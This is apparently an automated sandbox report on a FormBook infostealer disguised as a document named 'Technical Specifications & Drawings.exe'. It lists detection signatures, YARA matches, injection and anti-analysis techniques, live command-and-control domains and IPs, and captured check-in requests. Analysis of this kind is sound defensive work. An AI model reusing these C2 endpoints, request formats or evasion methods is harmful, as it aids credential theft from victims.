Windows Analysis Report
Technical Specifications & Drawings.exe

Overview

General Information

Sample Name: Technical Specifications & Drawings.exe
Analysis ID: 680337
MD5: 9b94f751e8cc145058db9f428c2ad571
SHA1: f12af989efe2b3b11e4784899ca4c6794da17879
SHA256: 893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Deletes itself after installation
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection

Source: Technical Specifications & Drawings.exe Virustotal: Detection: 32%
Source: Technical Specifications & Drawings.exe ReversingLabs: Detection: 21%
Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ Avira URL Cloud: Label: malware
Source: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91 Avira URL Cloud: Label: malware
Source: http://www.mexc-event-partner.site/02pi/ Avira URL Cloud: Label: malware
Source: www.tomoptique.fr/02pi/ Avira URL Cloud: Label: malware
Source: boshi-eg.online Virustotal: Detection: 12%
Source: mexc-event-partner.site Virustotal: Detection: 5%
Source: Technical Specifications & Drawings.exe Joe Sandbox ML: detected
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.tomoptique.fr/02pi/"]}
Source: Technical Specifications & Drawings.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Technical Specifications & Drawings.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: wntdll.pdbUGP source: Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Technical Specifications & Drawings.exe, Technical Specifications & Drawings.exe, 00000004.00000003.260883902.000000000144C000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000003.262790961.00000000015E3000.00000004.00000800.00020000.00000000.sdmp, Technical Specifications & Drawings.exe, 00000004.00000002.346919106.0000000001780000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.349077296.000000000423C000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000003.346500614.000000000409E000.00000004.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.515758890.00000000044EF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 00000013.00000002.513604126.00000000043D0000.00000040.00000800.00020000.00000000.sdmp

Networking

Source: C:\Windows\explorer.exe Network Connect: 109.234.162.62 80
Source: C:\Windows\explorer.exe Domain query: www.mexc-event-partner.site
Source: C:\Windows\explorer.exe Domain query: www.gzkanglongkeji.com
Source: C:\Windows\explorer.exe Network Connect: 107.155.208.43 80
Source: C:\Windows\explorer.exe Network Connect: 184.168.107.80 80
Source: C:\Windows\explorer.exe Network Connect: 67.23.226.119 80
Source: C:\Windows\explorer.exe Domain query: www.kirchhoff-darryl.com
Source: C:\Windows\explorer.exe Network Connect: 67.223.117.72 80
Source: C:\Windows\explorer.exe Domain query: www.boshi-eg.online
Source: C:\Windows\explorer.exe Domain query: www.tomoptique.fr
Source: C:\Windows\explorer.exe Domain query: www.esandcraic.com
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49803 -> 67.23.226.119:80
Source: Traffic Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
Source: Traffic Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
Source: Traffic Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49809 -> 67.223.117.72:80
Source: Malware configuration extractor URLs: www.tomoptique.fr/02pi/
Source: Joe Sandbox View ASN Name: O2SWITCHFR O2SWITCHFR
Source: Joe Sandbox View ASN Name: BEKKOAMEBEKKOAMEINTERNETINCJP BEKKOAMEBEKKOAMEINTERNETINCJP
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.kirchhoff-darryl.com Connection: close
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.tomoptique.fr Connection: close
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=4npjF3s9G6uWNp4ceBGqcNUcjkX96JEG8J4d3OAuWw45Kxpl9gSb2BHY5Eg4Nc6InaukRaYVJuT4y0aleUHPUlqgoOBFmRDZHQ==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.boshi-eg.online Connection: close
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.esandcraic.com Connection: close
Source: global traffic HTTP traffic detected: GET /02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ HTTP/1.1 Host: www.mexc-event-partner.site Connection: close
Source: Joe Sandbox View IP Address: 67.223.117.72 67.223.117.72
Source: Joe Sandbox View IP Address: 67.23.226.119 67.23.226.119
Source: global traffic HTTP traffic detected: POST /02pi/ HTTP/1.1 Host: www.mexc-event-partner.site Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.mexc-event-partner.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mexc-event-partner.site/02pi/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 08 Aug 2022 10:28:44 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 08 Aug 2022 10:28:49 GMT Server: Apache Content-Length: 5278 Connection: close Content-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Mon, 08 Aug 2022 10:29:02 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 00000013.00000002.517362036.000000000473B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat:200
Source: unknown HTTP traffic detected: POST /02pi/ HTTP/1.1 Host: www.mexc-event-partner.site Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.mexc-event-partner.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mexc-event-partner.site/02pi/ Accept-Language: en-US Accept-Encoding: gzip, deflate
Source: unknown DNS traffic detected: queries for: www.kirchhoff-darryl.com

E-Banking Fraud

Source: Yara match File source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Technical Specifications & Drawings.exe.39fd758.9.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.508193652.00000000024C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.314845901.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.513252120.0000000004260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000013.00000002.510569655.0000000002A30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 6080, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: Technical Specifications & Drawings.exe PID: 5084, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 1896, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Technical Specifications & Drawings.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.0.Technical Specifications & Drawings.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: String function: 017AB150 appears 133 times
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 4_2_017E9910
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E99A0 NtCreateSection,LdrInitializeThunk, 4_2_017E99A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9860 NtQuerySystemInformation,LdrInitializeThunk, 4_2_017E9860
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9840 NtDelayExecution,LdrInitializeThunk, 4_2_017E9840
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E98F0 NtReadVirtualMemory,LdrInitializeThunk, 4_2_017E98F0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A50 NtCreateFile,LdrInitializeThunk, 4_2_017E9A50
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A20 NtResumeThread,LdrInitializeThunk, 4_2_017E9A20
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A00 NtProtectVirtualMemory,LdrInitializeThunk, 4_2_017E9A00
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9540 NtReadFile,LdrInitializeThunk, 4_2_017E9540
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E95D0 NtClose,LdrInitializeThunk, 4_2_017E95D0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9710 NtQueryInformationToken,LdrInitializeThunk, 4_2_017E9710
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9FE0 NtCreateMutant,LdrInitializeThunk, 4_2_017E9FE0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E97A0 NtUnmapViewOfSection,LdrInitializeThunk, 4_2_017E97A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9780 NtMapViewOfSection,LdrInitializeThunk, 4_2_017E9780
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9660 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_017E9660
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E96E0 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_017E96E0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9950 NtQueueApcThread, 4_2_017E9950
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E99D0 NtCreateProcessEx, 4_2_017E99D0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EB040 NtSuspendThread, 4_2_017EB040
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9820 NtEnumerateKey, 4_2_017E9820
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E98A0 NtWriteVirtualMemory, 4_2_017E98A0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9B00 NtSetValueKey, 4_2_017E9B00
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA3B0 NtGetContextThread, 4_2_017EA3B0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A10 NtQuerySection, 4_2_017E9A10
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9A80 NtOpenDirectoryObject, 4_2_017E9A80
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9560 NtWriteFile, 4_2_017E9560
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EAD30 NtSetContextThread, 4_2_017EAD30
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9520 NtWaitForSingleObject, 4_2_017E9520
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E95F0 NtQueryInformationFile, 4_2_017E95F0
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017EA770 NtOpenThread, 4_2_017EA770
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9770 NtSetInformationFile, 4_2_017E9770
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9760 NtOpenProcess, 4_2_017E9760
Source: C:\Users\user\Desktop\Technical Specifications & Drawings.exe Code function: 4_2_017E9730 NtQueryVirtualMemory, 4_2_017E9730
